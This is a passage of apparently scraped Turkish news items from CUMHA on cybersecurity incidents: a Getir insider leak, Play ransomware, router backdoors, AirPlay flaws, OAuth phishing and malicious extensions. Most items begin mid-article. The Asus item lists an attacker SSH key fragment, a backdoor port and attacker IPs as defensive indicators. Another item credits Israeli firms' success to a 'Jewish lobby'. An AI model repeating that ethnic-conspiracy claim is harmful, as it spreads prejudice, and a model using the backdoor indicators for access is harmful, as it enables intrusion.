Veri sorgulamaları ve dijital izler tespit edildi
Yapılan teknik analizde, Ferhat Y.'nin ferhat.y***@getir.com** uzantılı kurumsal hesabından 23 Şubat – 11 Mart 2023 tarihleri arasında çok sayıda veri sorgusu yaptığı ve her sorguda 2 binin üzerinde satır veri çektiği belirlendi.

Savcılık, şüpheli hakkında TCK 244 (bilişim sistemine girme), TCK 136 (kişisel verileri hukuka aykırı elde etme) ve TCK 107 (şantaj) suçlamalarıyla 5 yıldan 13 yıla kadar hapis cezası talep etti.

Siber güvenlik önlemleri yeniden gündemde
Türkiye’nin en yaygın dijital servislerinden olan Getir ve BiTaksi’ye yönelik bu sızıntı, içeriden gelen tehditlerin ciddiyetini bir kez daha gündeme taşıdı. Uzmanlar, şirketlerin iç tehditlere karşı siber güvenlik protokollerini yeniden değerlendirmesi gerektiğini vurguluyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Key Drop yayınları mercek altına alındı
Sanal kasa açma sistemini farklı şekilde sunan Key Drop adlı internet sitesi, Türkiye’deki pek çok yayıncıyla iş birliği içerisinde çalışıyor. Site üzerinden yayın yapan ve kasalardan yüksek değerli eşyalar kazanma umuduyla içerik üreten yayıncılar, yasa dışı bahis kapsamında incelemeye alındı.

10 yayıncı gözaltına alındı
İstanbul Cumhuriyet Başsavcılığı Bilişim Suçları Soruşturma Bürosu tarafından yürütülen soruşturma çerçevesinde, Siber Suçlarla Mücadele ekipleri Twitch, YouTube, TikTok ve Instagram gibi platformlardaki Key Drop yayınlarını inceledi. Operasyon kapsamında 19 şüpheli hakkında işlem başlatıldı; 10 kişi gözaltına alındı.

Gözaltına alınan fenomenler belli oldu
Demirören Haber Ajansı’nın (DHA) aktardığı bilgiye göre gözaltına alınan fenomen yayıncılar arasında Kemal Can Parlak, Ferit Karakaya, Necati Akçay, Tolunay Ören, Ferhat Can Dama, Ömer Faruk Karataş, Mert Kancefer, Furkan Burak Bayrak, Duru Batır ve Eray Can Özkenar yer alıyor.

Key-drop.com’a erişim engeli
Ankara 12. Sulh Ceza Hakimliği’nin 08 Mayıs 2025 tarihli kararıyla Key Drop internet sitesine Türkiye’den erişim engeli getirildi. Site, yasa dışı bahis ve kumar faaliyetlerine teşvik ettiği gerekçesiyle kapatıldı.

Diğer şüpheliler aranıyor
Yetkililer, 5 şüphelinin yurtdışında, 2 kişinin şehir dışında olduğunu, 1 kişinin ise firari durumda olduğunu açıkladı. 1 şüphelinin ise adliyeye gelmesi bekleniyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

İsrail’in siber güvenlikteki rolü büyüyor
İsrail, siber güvenlik ve bilişim altyapıları konusunda dünyada önde gelen ülkeler arasında yer alıyor. Ülke, devlet destekli projeler ve Silikon Vadisi’ndeki Yahudi lobisinin etkisiyle global pazarda büyük bir pay elde etmiş durumda. Enes, bu altyapının arkasında sıklıkla İsrail ordusu ve istihbarat kurumlarında görev almış kişilerin bulunduğunu vurguluyor.

Türkiye’de hangi ürünler kullanılıyor?
Yazıda, Türkiye'de kullanılan ve İsrail merkezli dört ana şirketin ürünleri detaylı olarak inceleniyor:

• CheckPoint Software Technologies Ltd.: Tel Aviv merkezli şirket, siber güvenlik duvarları ve VPN hizmetleri sunuyor. Enes, şirketin birçok yöneticisinin İsrail devletiyle doğrudan ilişkili olduğunu aktarıyor.

• CheckMarx: Yazılım kodlarının güvenlik analizini yapan bu şirketin ürünleri Türkiye’de de yazılım geliştirme süreçlerinde kullanılıyor. Şirketin CTO’su Maty Siman’ın İsrail Başbakanlığı ve IDF geçmişi olduğu belirtiliyor.

• CyberArk Software Ltd.: Kimlik ve erişim yönetimi ürünleri sunan bu şirketin yöneticilerinin büyük kısmı İsrail Silahlı Kuvvetleri ve istihbarat birimlerinde görev yapmış.

• JFrog: CI/CD süreçlerinde kullanılan yazılım dağıtım platformu JFrog’un da yöneticilerinin çoğu İsrail kökenli. Binary yönetimi ve güvenlik taramaları sağlayan ürünleri Türkiye'de yaygın biçimde kullanılıyor.

Veri güvenliği ve bağımlılık eleştirisi
Enes, yazısında bu yazılımlar üzerinden ülke dışına sızabilecek verilerin, Türkiye’nin stratejik bilgilerini tehlikeye atabileceğini öne sürüyor. Yazılım ve bilişim sektöründe alternatif ürünler geliştirilmesi gerektiğini savunuyor ve kamu kurumlarının bu konuda daha bilinçli hareket etmesi çağrısında bulunuyor.

Bilgi kaynakları açık
Yazıda yer alan tüm yönetici bilgileri ve şirket açıklamaları, doğrudan ilgili firmaların resmi internet sitelerinde yayımlanan açık kaynak bilgilerden derlenmiş durumda. Enes, bu bilgileri okuyucularla şeffaf biçimde paylaşıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Plesk hızlıca müdahale etti
Bu açığın kamuoyuna duyurulmasının ardından Plesk, 5 Haziran tarihinde güncelleme yayımlayarak güvenlik zafiyetini giderdi. Güncellemenin, Plesk paneline sahip sunuculara otomatik olarak ulaşması bekleniyor. Ancak kullanıcıların kendi sistemlerinde güncellemenin yüklü olduğundan emin olmaları önemle tavsiye ediliyor.

Hangi sürümler etkileniyor, hangi güncellemeler gerekli?
Plesk yetkilileri, güvenlik açığının giderildiği güncellemeleri şöyle sıraladı:

• Plesk Obsidian 18.0.70 Update 1

• Plesk Obsidian 18.0.69 Update 4

Sistemi bu sürümlerden daha eski olan kullanıcıların derhal güncelleme yapmaları gerekiyor.

Alternatif çözüm: Sunucular arası geçiş
Güncellemeyi doğrudan alamayan kullanıcılar için Plesk, sunucular arası geçiş (server-to-server migration) seçeneğini öneriyor. Böylelikle daha güncel bir Plesk sürümüne geçilerek güvenlik açıklarının önüne geçilebiliyor.

Plesk yaşam döngüsü politikası göz önünde bulundurulmalı
Güncelleme desteği bulunmayan eski sürümler için kullanıcıların Plesk'in yaşam döngüsü (Lifecycle Policy) kurallarını incelemeleri ve uzun vadeli çözümler geliştirmeleri gerektiği vurgulandı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Play Grubu 900 Kurumu Hedef Aldı
ABD Federal Soruşturma Bürosu (FBI) verilerine göre Play fidye yazılım grubu, bugüne kadar yaklaşık 900 kurumu hedef aldı. Grup, yalnızca saldırı sayısını artırmakla kalmadı, aynı zamanda saldırı tekniklerini de çeşitlendirdi. 2025 Mayıs itibarıyla aktif saldırılar gerçekleştirmeye devam ediyor.

Yeni Saldırı Yöntemi: SimpleHelp Açığı
CVE-2024-57727 kodlu güvenlik açığı 16 Ocak 2025'te kamuoyuna duyuruldu. Play grubu ve ona bağlı tehdit aktörleri, bu zafiyeti hızla istismar etmeye başladı. SimpleHelp isimli uzak masaüstü erişim aracı üzerinden sistemlere sızan grup, bu yazılımı kullanan kuruluşlara güncelleme çağrısı yapılıyor.

Her Kurbana Özel Fidye Yazılımı
Play grubu, tespit edilmemek için fidye yazılımı dosyalarını her saldırı için yeniden derliyor. Bu da her kurban için benzersiz bir virüs oluşmasına yol açıyor. Antivirüs yazılımları için tespiti zorlaştıran bu yöntem, grubun teknik kapasitesini ortaya koyuyor.

Yeni Tehdit Türü: Telefonla Gözdağı
Grup yalnızca e-posta ile değil, artık doğrudan kurbanları telefonla arayarak tehdit ediyor. Kurumların farklı birimlerine ait numaralara ulaşarak, 'verilerinizi sızdırırız' şeklinde baskı kuruyorlar. Her kurban için özel olarak oluşturulan "@gmx.de" veya "@web.de" uzantılı e-posta adresleri kullanılıyor.

VMware Sistemler Özel Hedefte
Play grubu, VMware ESXi hipervizör sistemleri için özel olarak tasarlanmış bir fidye yazılımı geliştirdi. Sanal makineleri kapatıp, sanal makine dosyalarını AES-256 şifreleme ile kilitliyor. Aynı zamanda sistem arayüzündeki karşılama mesajını da fidye notuyla değiştiriyorlar.

Kendi Casus Yazılımları: GRIXBA
GRIXBA isimli bilgi hırsızlığı yazılımı, grubun geliştirdiği özel bir casus araç. Bu yazılım, ağ yapılarını tarıyor, antivirüs yazılımlarını tespit ediyor ve Zabbix 2023 kimliği altında gizlenmeye çalışıyor.

Kurumlar Ne Yapmalı?
CISA’nın önerilerine göre, alınması gereken önlemler şu şekilde sıralanıyor:

1. CVE-2024-57727 yamasını derhal uygulayın.

2. Özellikle VPN ve e-posta sistemlerinde çok faktörlü kimlik doğrulamayı devreye alın.

3. Ağ segmentasyonunuzu gözden geçirin.

4. Çevrimdışı yedeklerinizi kontrol edin.

5. Olay müdahale planınızı güncelleyin.

Play grubu artık sadece bir fidye yazılım grubu değil, organize bir siber suç ağı halini aldı. Hızlı teknik adaptasyonları, yeni açıkları hızla kullanmaları ve psikolojik baskı yöntemleriyle ciddi bir tehdit oluşturuyorlar.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Yapay zekâ ile sahte ses ve yüz taklidi yapıldı
Saldırganlar, Wiles’ın sesini ve yüzünü yapay zekâ teknolojileriyle taklit ederek rehberdeki kişilere mesajlar göndermeye başladı. Mesaj içeriklerinde, hedeflenen kişileri sohbet etmeye ikna etme ve Telegram uygulamasına yönlendirme girişimleri tespit edildi. Bu yöntemle oltalama saldırısı gerçekleştirildiği bildirildi.

FBI müdahale etti, güvenlik sağlandı
Söz konusu mesajların ardından personelin şüphelenerek durumu fark etmesi üzerine olay Federal Soruşturma Bürosu’na (FBI) bildirildi. FBI, soruşturmayı başlattığını ve hem Susie Wiles’ın telefonu hem de diğer personel cihazlarında güvenliğin sağlandığını açıkladı.

Daha önce de siber saldırı hedefi olmuştu
Henüz iPhone cihazının tam olarak nasıl ele geçirildiği bilinmiyor. Ancak daha önce, 2023 yılında İranlı siber saldırganlar tarafından Wiles’ın kişisel e-posta hesabının da ele geçirildiği bilgisi paylaşıldı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

CVE-2023-39780 açığı kritik rol oynadı
Kullanılan açıklardan biri CVE-2023-39780 olarak tanımlanan komut enjeksiyon açığı. Bunun yanı sıra CVE sistemi üzerinden takip edilmeyen açıkların da kullanıldığı bildirildi. Bu da saldırının iz bırakmadan ve dikkat çekmeden gerçekleşmesini kolaylaştırıyor.

Kalıcı kontrol sağlayan SSH anahtarı
Sisteme sızan saldırganlar, router cihazına özel bir SSH anahtarı yerleştirerek kalıcı erişim elde ediyor. Bu anahtara sahip olan kişiler, cihazlara yönetici haklarıyla otomatik olarak bağlanabiliyor. Daha da çarpıcı olan ise, bu erişimin cihaz yeniden başlatıldığında veya firmware güncellemeleri yapıldığında bile geçerliliğini sürdürmesi. GreyNoise araştırmacıları, bu durumun cihazlar üzerinde kalıcı bir kontrol sağladığını aktarıyor.

Devlet destekli siber tehdit şüphesi
Araştırmalara göre, saldırılar Malezya, Avrupa ve Asya kaynaklı IP adreslerinden geliyor. Bu da saldırının arkasında devlet destekli bir aktör olabileceği ihtimalini gündeme getiriyor. İlk belirtiler Mart ayının ortasında tespit edildi ve durum, GreyNoise tarafından ilgili devlet kurumlarına bildirildikten sonra kamuoyuna duyuruldu. Güvenlik firması Sekoia da geçtiğimiz hafta benzer verileri paylaştı. Sekoia'nın analizlerine göre saldırı, ViciousTrap adlı bilinmeyen bir tehdit grubu tarafından gerçekleştirilmiş olabilir.

Kullanıcılar ne yapmalı?
Asus router kullanıcılarının cihazlarını kontrol etmeleri öneriliyor. SSH ayarlarında şu yapılandırmanın bulunup bulunmadığına dikkat edilmeli:
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAo41nBoVFfj4HlVMGV+YPsxMDrMlbdDZ...

Eğer bu tür bir anahtar veya port 53282 üzerinden açık bir SSH bağlantısı varsa, cihaz yüksek olasılıkla saldırıya uğramış demektir. Bu durumda, kullanıcıların ilgili anahtarı ve port ayarını manuel olarak silmeleri gerekiyor. Ayrıca aşağıdaki IP adreslerinden gelen bağlantıların sistem günlüklerinde yer alıp almadığı kontrol edilmeli:

• 101.99.91[.]151

• 101.99.94[.]173

• 79.141.163[.]179

• 111.90.146[.]237

Uzmanlar, yalnızca Asus değil tüm router kullanıcılarının düzenli yazılım güncellemeleri yapmalarını ve varsayılan yönetici şifrelerini değiştirmelerini tavsiye ediyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Protokol ve sponsor konuşmalarıyla başlayacak
Zirve, saat 09.00’da kayıt süreciyle başlayacak. 09.45-11.00 saatleri arasında yapılacak protokol konuşmalarında Türkiye Bilişim Derneği Genel Başkanı Kenan Altınsaat ve T.C. Sanayi ve Teknoloji Bakan Yardımcısı Zekeriya Coştu konuşma yapacak.

11.00-11.15 arasında platin sponsor SAYTEC adına CTO Yakup Saygın konuşacak.

Kritik altyapılar ve yapay zekâ tehditleri gündemde
Saat 11.15’te başlayacak ilk oturumda, 'Kritik Altyapılarda Sessiz Savaş: Dijital Saldırılar, Fiziksel Etkiler, Yapay Zekânın Getirdiği Tehditler' başlığı altında çeşitli alanlardan uzmanlar görüşlerini paylaşacak. Panelin moderatörlüğünü SAU Kritik Altyapılar Ulusal Test Yatağı Merkezi Koordinatörü Prof. Dr. İbrahim Özçelik üstlenecek. Panelde; Ahmet Pekel, Can Demirel, Cem Dursun ve Mahmut Küçük konuşmacı olarak yer alacak.

Yerlileşme ve girişimcilik vurgusu
Öğle yemeğinin ardından saat 13.30’da Türkiye Bilişim Derneği tarafından verilen Siber Güvenlik Ekosistemine Katkı Ödülleri sahiplerini bulacak. 14.00’te Altın Sponsor İNDAS Cybersecurity Kurucu Ortağı Yavuz Aydın konuşma yapacak.

Aynı saatlerde TED Üniversitesi’nden Prof. Dr. Murat Karakaya, ‘Büyük Dil Modellerinin İmkân ve Kabiliyetleri ile Getirdiği Riskler’ konulu eğitim oturumunu gerçekleştirecek.

14.15’te başlayacak ikinci panelde ise ‘Siber Savunmada Yerlileşme: Sorunlar ve Fırsatlar; Girişimci, Yatırımcı ve Kamu Perspektifi’ başlığı altında sektörel değerlendirmeler yapılacak. Panelin moderatörlüğünü SSB Türkiye Siber Güvenlik Kümelenmesi Genel Koordinatörü Alpaslan Kesici üstlenecek. Konuşmacılar arasında Hakan Terzioğlu, İsmail Güneş ve Savaş Ergen yer alacak.

Eğitimler ve TEDx konuşmaları ile kapanış
Saat 15.00’te Ankara Üniversitesi’nden Öğr. Gör. Muhammed Saadettin Kaya, 'Mahremiyet Koruyucu Tekniklerin Yapay Zekâ Eğitiminde Kullanımı' konulu eğitimi sunacak.

15.45-16.45 saatleri arasında TEDx konuşmaları gerçekleştirilecek. Zirve, 16.45-17.15 saatleri arasında yapılacak kapanış ve ödül töreni ile sona erecek.

Kayıt Adresi

Kaynak: CUMHA - CUMHUR HABER AJANSI

Veri güvenliği ve gizliliği sağlıyor
Özellikle halka açık Wi-Fi ağlarında yapılan internet bağlantıları, kötü niyetli kişiler tarafından kolaylıkla takip edilebilmektedir. VPN kullanımı, bu tür riskleri minimize ederek kullanıcının IP adresini gizler, veri paketlerini şifreler ve kimlik koruması sağlar.

Farklı kullanım alanları mevcut
VPN’ler sadece güvenlik için değil, aynı zamanda coğrafi engelleri aşmak ve erişimi kısıtlanmış içeriklere ulaşmak için de kullanılmaktadır. Örneğin, bazı ülkelerde yasaklı olan sosyal medya platformlarına ya da yayın servislerine VPN sayesinde erişim sağlanabilir.

Kurulum ve kullanım kolaylığı sağlıyor
VPN hizmetleri, mobil cihazlardan masaüstü bilgisayarlara kadar geniş bir platformda desteklenmektedir. Çoğu VPN sağlayıcısı, kullanıcı dostu arayüzleri sayesinde hızlı bir kurulum ve kolay kullanım imkânı sunmaktadır.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Tehditler giderek artıyor
Günümüzde dijitalleşmenin hızla yayılması, siber saldırganlar için daha fazla hedef yaratmaktadır. Fidye yazılımlar, kimlik avı saldırıları, veri sızıntıları ve devlet destekli siber casusluk faaliyetleri, en sık karşılaşılan tehdit türleri arasında yer alıyor. Bu tehditler yalnızca maddi zarara yol açmakla kalmıyor, aynı zamanda kişisel mahremiyeti ve ulusal güvenliği de riske atıyor.

Koruma yöntemleri çeşitleniyor
Gelişen tehditlere karşı savunma stratejileri de evriliyor. Antivirüs yazılımları, güvenlik duvarları, çok faktörlü kimlik doğrulama sistemleri ve yapay zekâ destekli izleme teknolojileri, siber güvenlik alanında sıkça kullanılan önlemler arasında. Ayrıca çalışanların bilinçlendirilmesi ve düzenli güvenlik eğitimleri de saldırıların başarı oranını düşürmede önemli bir rol oynuyor.

Kritik altyapılar hedefte
Enerji, ulaşım, sağlık gibi sektörlerde kullanılan dijital altyapılar, siber saldırılar açısından öncelikli hedefler arasında yer alıyor. Bu altyapıların güvenliği, kamu güvenliği ve ekonomik istikrar açısından büyük önem taşıyor. Bu nedenle hem özel sektör hem de kamu kurumları siber güvenliğe yatırım yapma konusunda daha hassas davranıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

İhlal 17 Mayıs’ta tespit edildi
Adidas Spor Malzemeleri Satış ve Pazarlama A.Ş. tarafından 17 Mayıs 2025 tarihinde Kuruma yapılan bildirimde, ihlalin bir çalışan tarafından Siber Güvenlik Olaylarına Müdahale Ekibine iletilen bir e-posta ile fark edildiği belirtildi. Söz konusu e-postada, üçüncü bir şahsın müşteri verilerine eriştiği iddia edildi ve eki dosyada yer alan bilgilerin büyük olasılıkla Adidas’a ait olduğu tespit edildi.

Sızdırılan veriler arasında neler var?
KVKK'nın açıklamasına göre, sızdırılan bilgiler arasında kullanıcıların isimleri, e-posta adresleri, cinsiyet bilgileri, doğum tarihleri ve telefon numaraları yer alıyor. Ancak her kullanıcının tüm veri tiplerinden etkilenmediği, bazı kullanıcıların yalnızca belirli bilgileri sızdırılmış olabileceği ifade edildi.

Adidas’tan teknik açıklama gelmedi
Adidas tarafından yürütülen teknik analiz ve güvenlik önlemlerine dair herhangi bir bilgi henüz paylaşılmadı. Saldırının kaynağı ve yöntemine ilişkin soruşturmanın ise halen sürdüğü belirtildi.

KVKK açıklamasına göre süreç devam ediyor
Kurum, Kişisel Verilerin Korunması Kanunu’nun 12. maddesine dayanarak 22 Mayıs 2025 tarihli kararla, söz konusu veri ihlali bildirisinin internet sitesinde yayımlanmasına karar verdi. Sürece ilişkin gelişmelerin kamuoyuyla paylaşılacağı belirtildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

23 ayrı güvenlik açığı tespit edildi
Siber güvenlik firması Oligo’nun yaptığı araştırmaya göre, Apple’ın AirPlay protokolünde 23’e kadar güvenlik açığı bulunuyor. Bu açıkların büyük çoğunluğu, üçüncü taraf cihazların AirPlay uyumluluğu için kullanılan Yazılım Geliştirme Kiti (SDK) üzerinden kaynaklanıyor.

Uzaktan erişim ve sıfır tıklama saldırısı riski
Oligo CTO’su Gal Elbaz, bu açıkların bilgisayar korsanları tarafından sıfır tıklamalı saldırılar düzenlemek için kullanılabileceğini belirtti. Saldırganlar, aynı Wi-Fi ağına bağlı cihazlara kullanıcı etkileşimi olmadan erişebiliyor, kötü amaçlı yazılım yükleyebiliyor ve veri çalabiliyor.

Apple'dan kullanıcılarına güvenlik çağrısı
Apple, bu güvenlik açıklarına karşı alınabilecek en etkili önlemin, AirPlay özelliğinin devre dışı bırakılması ve iPhone'ların en son sürüme güncellenmesi olduğunu açıkladı. Ayrıca yalnızca güvenilir kaynaklardan dosya alınması gerektiği vurgulandı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Sahte güvenlik mesajlarıyla tuzak kuruluyor
Bu saldırı yöntemi, “no-reply e-posta saldırısı” olarak adlandırılıyor. Kullanıcılara, hesaplarıyla ilgili sözde “yasal süreç” gerekçesiyle bilgi talep eden e-postalar gönderiliyor. Mesajlarda yer alan bağlantılar, sahte bir Google destek sayfasına yönlendirme yaparak kişisel bilgilerin paylaşılması hedefleniyor.

Bağlantılara tıklamak büyük risk taşıyor
Siber güvenlik uzmanları, bu e-postalardaki bağlantılara tıklanmasının ciddi sonuçlara yol açabileceğini belirtiyor. Bu bağlantılar aracılığıyla zararlı yazılımlar indirilebiliyor ya da parola hırsızlığına neden olan sahte sayfalara erişim sağlanabiliyor. Bazı durumlarda, sadece bağlantıdaki belgelerin görüntülenmesi bile Gmail ve Google Drive içeriklerine kısmi erişim sağlayabiliyor.

OAuth sistemi üzerinden yetkisiz erişim sağlanıyor
Yazılım geliştiricisi Nick Johnson, saldırganların Google’ın OAuth sistemini suistimal ettiğini açıkladı. Bu yöntemle sahte uygulamalar oluşturularak, kullanıcıdan bu uygulamalara erişim izni vermesi isteniyor. Johnson, bu tekniği “en tehlikeli tuzak” olarak tanımlıyor ve yalnızca resmi Google bildirimlerine güvenilmesi gerektiğini vurguluyor.

Google’dan korunma önerileri
Google, ‘güvenlik’, ‘hesap doğrulama’ ya da ‘yasal işlem’ gibi aciliyet içeren ifadelerle gelen e-postalara karşı dikkatli olunması gerektiğini belirtti. Bu tür mesajlar genellikle kullanıcıları korkutarak harekete geçirmeyi amaçlayan dolandırıcılık girişimleridir. Şirket, kullanıcıların e-posta gönderen adresini mutlaka kontrol etmesi ve şüpheli e-postaları açmadan silmesi gerektiğini ifade etti.

Ayrıca Google, kullanıcıların hesap güvenliğini artırmak için şu iki adımı atmasını öneriyor:

• İki Aşamalı Kimlik Doğrulama (2FA) özelliğini aktif hale getirin.

• Gmail hesabınıza erişimi olan üçüncü taraf uygulamaları düzenli olarak kontrol edin ve ihtiyaç dışı olanların erişim iznini kaldırın.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kart şifreleri siber saldırıların hedefinde
Nakit paranın alım gücünün azaldığı günümüzde, kredi kartları günlük hayatın ayrılmaz bir parçası haline geldi. Bu durum, kart şifrelerinin güvenliğini her zamankinden daha önemli hale getiriyor. Ancak uzmanlar, kullanıcıların büyük kısmının ciddi şifre hataları yaptığını ifade ediyor.

En çok tercih edilen şifreler hackerların ilk denemesi oluyor
Siber güvenlik araştırmalarına göre, en çok tercih edilen 4 haneli şifreler arasında “1234”, “0000”, “1111” ve doğum yılı gibi kolay tahmin edilebilecek rakamlar yer alıyor. Bu tür kombinasyonlar, dolandırıcılar tarafından ilk denenenler arasında bulunuyor. Otomatik yazılımlar sayesinde bu tarz şifreler saniyeler içinde çözülebiliyor.

Uzmanlardan güvenli şifre tavsiyeleri
Uzmanlar, kart şifresi belirlerken tahmin edilmesi zor ve rastgele sayı kombinasyonlarının kullanılmasını öneriyor. Ayrıca, şifrenin telefon PIN koduyla aynı olmaması ve düzenli aralıklarla değiştirilmesi de güvenlik açısından kritik öneme sahip.

Kaynak: CUMHA - CUMHUR HABER AJANSI

23'e yakın açık tespit edildi
Siber güvenlik firması Oligo tarafından yapılan araştırmada, Apple'ın AirPlay protokolünde 23 farklı güvenlik açığı bulunduğu belirlendi. Bu açıkların büyük kısmının, üçüncü taraf üreticilerin AirPlay ile uyumlu hale getirdiği cihazlarda kullanılan AirPlay Yazılım Geliştirme Kiti (SDK) içinde yer aldığı ifade edildi.

Cihazlar kullanıcı etkileşimi olmadan ele geçirilebiliyor
Oligo'nun CTO'su Gal Elbaz, keşfedilen açıkların 'sıfır tıklama' (zero-click) saldırılarına olanak sağladığını belirtti. Bu durum, siber korsanların kullanıcı herhangi bir işlem yapmadan cihazlara sızmasına, kötü amaçlı yazılım yüklemesine veya veri çalmasına neden olabiliyor. Açıkların çoğu zaman yamanmasının zor olduğu, bazı cihazlarda ise bu yamaların hiçbir zaman yapılmayabileceği vurgulandı.

Apple’dan alınması gereken önlemler
Apple, bu güvenlik risklerini azaltmak amacıyla kullanıcıların cihazlarını acilen en son iOS sürümüne güncellemelerini ve AirPlay özelliğini devre dışı bırakmalarını öneriyor. Ayrıca, AirPlay üzerinden yalnızca güvenilir kişilerden dosya alınması da önemli bir güvenlik adımı olarak değerlendiriliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Uluslararası akredite eğitim programları
2007 yılında kurulan Abadnet Institute, yıllık 10.000'den fazla öğrenciye hizmet veren, uluslararası akredite programlarıyla dikkat çeken bir eğitim kuruluşu. Ortaklık kapsamında INE Security, Abadnet’in eğitim kamplarını Junior Penetration Tester (eJPT) içeriği, uygulamalı laboratuvarlar ve CompTIA Security+ gibi sertifika hazırlıkları ile destekliyor. Bu sayede öğrencilere hem teorik hem de uygulamalı eğitim sunulacak.

İlk akademi tamamen doldu
Yeni iş birliği, 200 öğrencilik ilk akademiyle başladı ve tüm lisans kontenjanları tamamen doldu. INE Security Baş Gelir Sorumlusu Brett Erskine, yapılan açıklamada şu ifadeleri kullandı: ‘Suudi Arabistan ve GCC bölgesinde güçlü bir üne sahip olan Abadnet ile çalışmaktan heyecan duyuyoruz. Bu ortaklık, öğrencilere pratik beceriler ve sektörel sertifikalar sunarak kariyerlerinde önemli bir sıçrama imkanı veriyor.’

Abadnet, INE içerikleriyle eğitim kalitesini artırıyor
Abadnet Institute Operasyon Direktörü Ahmed Alkathiri, INE Security’nin içerik kalitesine dikkat çekerek şunları söyledi: ‘INE’nin eğitim materyalleri kariyerim boyunca bana büyük katkı sağladı. Bu ortaklık sayesinde öğrencilerimize en ileri düzeyde eğitim verebilme kapasitemizi artırıyoruz.’ Abadnet Siber Güvenlik Bölüm Başkanı Ahmed Fatouh ise, INE içeriklerinin eğitim müfredatına entegre edilmesinin önemli bir adım olduğunu belirtti.

Gelecek odaklı yatırım
Bu iş birliği, INE Security’nin bölgedeki dijital istihdam ekosistemini güçlendirme ve yüksek nitelikli siber güvenlik uzmanları yetiştirme hedefinin bir parçası olarak değerlendiriliyor. Ortaklık sayesinde, penetrasyon testi ve etik hackleme gibi alanlarda işe hazır yetenekler geliştirilmesi amaçlanıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Sistemlere entegre edilen gizli iletişim donanımları
İddialara göre, Çin menşeli bazı güneş invertörleri ve batarya sistemlerinde hücresel iletişim donanımları yer aldı. Bu sistemler, enerjiyi şebekeye aktaran ve depolayan temel ekipmanlar arasında yer alıyor. Uzmanlara göre, bu donanımlar kötü niyetli kişiler tarafından uzaktan devre dışı bırakılabilir ve bu da geniş çaplı elektrik kesintilerine neden olabilir.

Kasım 2024’te sinyal müdahalesi yaşandığı öne sürüldü
Reuters’ın haberinde, Kasım 2024’te bazı invertörlerin Çin'den gelen sinyallerle uzaktan kapatıldığı vakalar bildirildi. Vakaların tüm etkisi henüz netleşmese de, yetkililer arasında ciddi güvenlik endişeleri doğurduğu belirtildi.

Belgelerde yer almayan bileşenler
Güneş sistemlerinde uzaktan erişim ve performans izleme için iletişim modülleri standart hale gelmiş durumda. Ancak uzmanların dikkat çektiği nokta, bu bileşenlerin hiçbir teknik belgede belirtilmemiş olması. Bu durum, sistemlerin siber güvenlik önlemlerine entegre edilmemesine ve dış müdahalelere açık hale gelmesine yol açıyor.

ABD Enerji Bakanlığı uyarıyor
ABD Enerji Bakanlığı sözcüsü, “Bu işlevsellik kötü niyetli olmayabilir, ancak satın alanların ürünlerin tam özelliklerini bilmesi gerekir” diyerek, belgelenmemiş donanımların güvenlik açıkları oluşturduğuna dikkat çekti.

Çin iddiaları reddediyor
Olayda adı geçen Çinli firmaların sayısı netleşmezken, Çin’in Washington Büyükelçiliği iddiaları reddetti. Yapılan açıklamada, ‘ulusal güvenlik kavramının genelleştirilmesine ve Çin’in teknoloji başarılarının karalanmasına’ karşı çıkıldığı belirtildi.

ABD’de Çin menşeli ekipman oranı yüksek
Enerji danışmanlığı şirketi Wood Mackenzie’nin verilerine göre, dünyadaki güneş invertörlerinin yüzde 78’i Çin üretimi. ABD’deki güneş paneli üretim kapasitesinin yüzde 39’u da Çinli firmalara ait. Bu durum, ABD enerji altyapısının Çin’e olan yüksek bağımlılığını gözler önüne seriyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kötü niyetli uzantılar aşırı izinler alıyor
Kötü amaçlı eklentiler, manifest.json dosyaları aracılığıyla kendilerine geniş kapsamlı izinler tanıyor. Bu sayede tarayıcıda ziyaret edilen her siteyle etkileşim kurabiliyor, saldırganın kontrolündeki etki alanlarından zararlı komutlar alıp çalıştırabiliyor ve kullanıcıyı istenmeyen sitelere yönlendirebiliyor.

Meşru hizmetleri taklit ederek yayılıyorlar
Uzantıların dağıtımı, DeepSeek, Manus, DeBank, FortiVPN ve Site Stats gibi bilinen hizmetleri taklit eden sahte web siteleri üzerinden gerçekleştiriliyor. Bu siteler, kullanıcılara sahte uzantıları yükletmek için meşruymuş gibi tasarlanıyor. Uzantılar ayrıca, DOM üzerindeki "onreset" olay işleyicisi aracılığıyla içerik güvenlik politikalarını (CSP) atlatmaya çalışıyor.

Facebook araçları da kullanılmış olabilir
DTI ekibi, saldırganların kullanıcıları sahte uzantılara yönlendirmek için sosyal medya platformlarını da kullandığını düşünüyor. Bazı sahte sitelerin Facebook izleme kimlikleri içerdiği ve kullanıcı çekmek amacıyla Facebook sayfaları, grupları ve reklamlarının kullanıldığı değerlendiriliyor.

Google harekete geçti, kullanıcılar uyarıldı
Tespit edilen kötü amaçlı uzantılar, Google tarafından Chrome Web Mağazası’ndan kaldırıldı. Ancak uzmanlar, kullanıcıların hâlâ dikkatli olmaları gerektiğini belirtiyor. Uzantı yüklemeden önce geliştiricilerin doğrulanması, izinlerin kontrol edilmesi ve kullanıcı yorumlarının dikkatle incelenmesi tavsiye ediliyor.

Manipülasyon riski devam ediyor
DomainTools'un bulgularına göre, bazı uzantılar kullanıcı puanlamalarını manipüle etmek amacıyla düşük puan veren kullanıcıları özel geri bildirim formlarına yönlendirirken, yüksek puan verenleri doğrudan Chrome Mağazası'na yönlendiriyor. Bu da, değerlendirmelerin güvenilirliğini sorgulatıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

c/side araştırmacısı Himanshu Anand tarafından Salı günü yayımlanan analizde, saldırının dikkat çeken yönünün kullanılan teslimat yöntemi olduğu belirtildi. Anand, 'Yükün kendisi yeni bir şey değil (bir başka yetişkin kumar dolandırıcılığı), ancak teslimat yöntemi öne çıkıyor' dedi.
